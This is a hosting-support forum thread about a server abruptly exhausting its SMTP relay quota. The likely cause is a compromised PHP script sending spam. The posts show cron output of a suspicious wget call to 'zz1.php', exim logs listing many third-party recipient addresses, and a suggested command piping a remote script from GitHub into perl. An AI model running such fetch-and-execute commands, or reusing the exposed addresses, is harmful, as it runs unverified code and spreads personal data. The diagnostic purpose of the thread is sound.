SMTP Relay usage
I have te problem of my SMTP.
We have not got a campaign etc... In generally we use 0.5-2% of limit, but some days ago has been changed. Here is the history.
SMTP Relay History
DATE USED LIMIT PERCENT
2018-05-30 5000 5000 100.0%
2018-05-29 0 5000 0.0%
2018-05-28 0 5000 0.0%
2018-05-27 0 5000 0.0%
2018-05-26 0 5000 0.0%
2018-05-25 5000 5000 100.0%
2018-05-24 5000 5000 100.0%
2018-05-23 5000 5000 100.0%
2018-05-22 5000 5000 100.0%
2018-05-21 5000 5000 100.0%
2018-05-20 0 5000 0.0%
2018-05-19 2 5000 0.04%
2018-05-18 2053 5000 41.06%
2018-05-17 44 5000 0.88%
2018-05-16 21 5000 0.42%
2018-05-15 45 5000 0.9%
2018-05-14 42 5000 0.84%
2018-05-13 26 5000 0.52%
2018-05-12 20 5000 0.4%
2018-05-11 7 5000 0.14%
2018-05-10 24 5000 0.48%
2018-05-09 40 5000 0.8%
2018-05-08 111 5000 2.22%
2018-05-07 44 5000 0.88%
2018-05-06 30 5000 0.6%
2018-05-05 94 5000 1.88%
2018-05-04 118 5000 2.36%
2018-05-03 51 5000 1.02%
2018-05-02 67 5000 1.34%
2018-05-01 57 5000 1.14%
2018-04-30 54 5000 1.08%
2018-04-29 36 5000 0.72%
2018-04-28 27 5000 0.54%
2018-04-27 12 5000 0.24%
2018-04-26 8 5000 0.16%
2018-04-25 15 5000 0.3%
2018-04-24 7 5000 0.14%
2018-04-23 0 5000 0.0%
2018-04-22 0 5000 0.0%
2018-04-21 0 5000 0.0%
2018-04-20 21 5000 0.42%
2018-04-19 11 5000 0.22%
2018-04-18 13 5000 0.26%
2018-04-17 30 5000 0.6%
2018-04-16 18 5000 0.36%
2018-04-15 2 5000 0.04%
2018-04-14 11 5000 0.22%
2018-04-13 14 5000 0.28%
2018-04-12 49 5000 0.98%
2018-04-11 25 5000 0.5%
2018-04-10 34 5000 0.68%
2018-04-09 44 5000 0.88%
2018-04-08 6 5000 0.12%
2018-04-07 8 5000 0.16%
2018-04-06 26 5000 0.52%
2018-04-05 15 5000 0.3%
2018-04-04 37 5000 0.74%
2018-04-03 20 5000 0.4%
2018-04-02 21 5000 0.42%
2018-04-01 10 5000 0.2%
The Exim stoped i had to restart on May 30th. butnow SMTP realy usage is full.
No Exim does sending emails but does NOT receive any...
Please, advice.
-
These two resources might help: View Relayers - Version 70 Documentation - cPanel Documentation How to Prevent Email Abuse - cPanel Knowledge Base - cPanel Documentation 0 -
As I wrote, Exim was dead but now running. Naturally the sending emails are limited. The root (Cron Daemon) send many emails me. Here's: Date: Thu, 31 May 2018 05:42:01 -0700 From: root@ip-192xxxx.secureserver.net (Cron Daemon) To: gc@ip-192xxxx.secureserver.net --2018-05-31 05:41:01-- http://example.com/zz1.php?reboot=yes Resolving example.com... 192.xxxxx Connecting to example.com|192.xxxx|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: "zz1.php?reboot=yes.5868" 0K 2.21K=0.4s 2018-05-31 05:42:01 (2.21 KB/s) - "zz1.php?reboot=yes.5868" saved [943]0 -
I would also suggest running a malware scan - cPanel offers ClamAV but there are others, if you're not sure what to use. Thanks! 0 -
Thanks. The problem solved. 0 -
Hi @Lillike I'm happy to hear that! Thank you for letting us know. 0 -
Today server's over quota... :( ClamAv installed and working... zz1.php... over. Mail delivery reports checked. A lots of file found with the following messages: SMTP error from remote mail server after initial connection: 554 p3plsmtpout00xxx.prod.phx3.secxx.net : HOSTING RELAY : Pn5Jf0EURyedJ : DED : You've reached your daily relay quota - 192.xxxx Before above messages: Event: defer warning Sender User: gc Sender Domain: gc.com From Address: gc@ip-192-xxxxx.secureserver.net Sender: gc Sent Time: Jun 4, 2018, 12:51:12 PM Sender Host: localhost Sender IP: 127.0.0.1 Authentication: localuser Spam Score: Recipient: zv393@mail.ru Delivered To: Delivery User: -system- Delivery Domain: Router: send_to_smart_host Transport: remote_smtp Out Time: Jun 4, 2018, 5:07:17 PM ID: 1fPn4s-0005Zl-Cg Delivery Host: Delivery IP: Size: 11.96 KB Result: retry time not reached for any host for 'mail.ru' (all notice is from same domain and recipients from RU.) Sent Summery Report from 6/1 to 6/5. Domain User Successful Deferrals Failures Failed and Deferred Total Messages Data Sent gc.com gc 211 1,095,507 35,783 1,131,290 10,738 542.97 KB root 30 236 6 242 18 774.79 KB Please, advice. 0 -
Hi @Lillike It sounds like you still have a compromised PHP script on the account. What is the output of the following: exigrep 1fPn4s-0005Zl-Cg /var/log/exim_mainlog0 -
A long list reveived with the following (it's not all): stem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy @list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 03:51:06 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1fPn4s-0005Zl-Cg +++ 1fPn4s-0005Zl-Cg has not completed +++ 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg <= gc@ip-192-xxxxx.secxxxxx.net U=gc P=local S=12242 id=595CEAB9B26648EB37327BC0E46C5BB6@spartascie nce.ru T="\320\237\321\200\320\276\321\205\320\276\320\264\320\270 \320\276\320\277\321\200\320\276\321\201\321\213, \320\277\320\276\320\273\321\203\321\207\320\260\32 0\271 \320\264\320\265\320\275\321\214\320\263\320\270" for pavkov1969@gmail.com nadegdam@list.ru www.promodj@mail.ru badashov50@mail.ru aleninaalena1989@gmail.com sant alovanm@mail.ru vladimir.bandin@yandex.ru zv393@mail.ru nikkuningas@rambler.ru esina.irina1549@gmail.com rustem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy @list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == zv393@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nikkuningas@rambler.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'rambler.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == esina.irina1549@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == rustem196@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == sin.antihrista666@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nikolay.kamenskiy@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == artem-ushenin@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == badashov50@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == aleninaalena1989@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == santalovanm@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == vladimir.bandin@yandex.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'yandex.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == zv393@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nikkuningas@rambler.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'rambler.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == esina.irina1549@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == rustem196@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == sin.antihrista666@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nikolay.kamenskiy@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == artem-ushenin@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == badashov50@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == aleninaalena1989@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == santalovanm@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == vladimir.bandin@yandex.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'yandex.ru' /bin/bash: -c: line 0: syntax error near unexpected token `(' /bin/bash: -c: line 0: `lessecho -p0x22 -d0x22 -e\\ -n0x3b -n0x20 -n0x2a -n0x3f -n0x9 -n0xa -n0x27 -n0x22 -n0x28 -n0x29 -n0x3c -n0x3e -n0x5b -n0x5d -n0x7c -n0x26 -n0x5e -n0x60 -n0x23 -n0x5c -n0x24 -n0x25 -n0x3d -n0x7e -- -0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not 2018-06-04 08:07:49 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru' 0 -
Hi @Lillike Can you run the command again but omit these lines? 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'0 -
If you are constantly getting the symptoms of malware manifesting on your server, you may need to consider the two following resources: Tips to Make Your Server More Secure - cPanel Knowledge Base - cPanel Documentation Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation 0 -
rpvw: ClamAv, ModSecurity, firewall etc. are working... Lauren: exigrep 1fPn4s-0005Zl-Cg /var/log/exim_mainlog run the command: +++ 1fPn4s-0005Zl-Cg has not completed +++ 2018-06-04 03:51:06 1fPn4s-0005Zl-Cg <= gc@ip-192-xxxx.secureserver.net U=gc P=local S=12242 id=595CEAB9B26648EB37327BC0E46C5BB6@spartascience.ru T="\320\237\321\200\320\276\321\205\320\276\320\264\320\270 \320\276\320\277\321\200\320\276\321\201\321\213, \320\277\320\276\320\273\321\203\321\207\320\260\320\271 \320\264\320\265\320\275\321\214\320\263\320\270" for pavkov1969@gmail.com nadegdam@list.ru www.promodj@mail.ru badashov50@mail.ru aleninaalena1989@gmail.com santalovanm@mail.ru vladimir.bandin@yandex.ru zv393@mail.ru nikkuningas@rambler.ru esina.irina1549@gmail.com rustem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy@list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru ..... 0 -
Hi @Lillike This shows us is that the user gc is sending mail but that is most likely because a script is responsible for it. Since the message hasn't sent yet can you can view the headers: exim -Mvh 1fPn4s-0005Zl-Cg
But ultimately what you need to find is where the message originated from within the user's account something we use to quickly identify the source of spam mail:perl <(curl -s https://raw.githubusercontent.com/cPanelTechs/SSE/master/sse.pl) -s
It should point out where that mail is coming from though I think the entire gc user directory needs to be audited at this point.0
Please sign in to leave a comment.
Comments
13 comments